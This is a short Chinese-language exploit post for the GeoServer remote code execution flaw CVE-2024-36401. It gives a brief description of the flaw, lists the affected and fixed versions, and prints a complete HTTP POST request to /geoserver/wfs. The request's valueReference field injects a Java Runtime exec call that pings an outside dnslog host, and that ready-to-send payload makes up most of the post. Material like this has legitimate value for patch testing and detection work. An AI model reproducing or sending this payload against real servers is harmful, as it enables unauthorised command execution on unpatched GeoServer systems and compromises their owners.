Geoserver表达式注入致远程代码执行漏洞（CVE-2024-36401）poc

漏洞描述GeoServer是一个功能齐全,遵循OGC开放标准的开源WFS-T和WMS服务器。CVE-2024-36401中，攻击者可构造恶意请求执行任意java代码，控制服务器。影响范围2.25.0 <= GeoServer < 2.25.22.24.0 <= GeoServer < 2.24.4GeoServer < 2.23.6安全版本GeoServer 2.25.2GeoServer 2.24.4GeoServer 2.23.6

POST /geoserver/wfs HTTP/1.1Host: xxxxUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/9.1.2 Safari/605.1.15Connection: closeContent-Length: 362Content-Type: application/xmlAccept-Encoding: gzip, deflate, br<wfs:GetPropertyValue service='WFS' version='2.0.0' xmlns:topp='http://www.openplans.org/topp' xmlns:fes='http://www.opengis.net/fes/2.0' xmlns:wfs='http://www.opengis.net/wfs/2.0' valueReference='exec(java.lang.Runtime.getRuntime(),"ping xxx.dnslog.cn")'> <wfs:Query typeNames='topp:states'/></wfs:GetPropertyValue>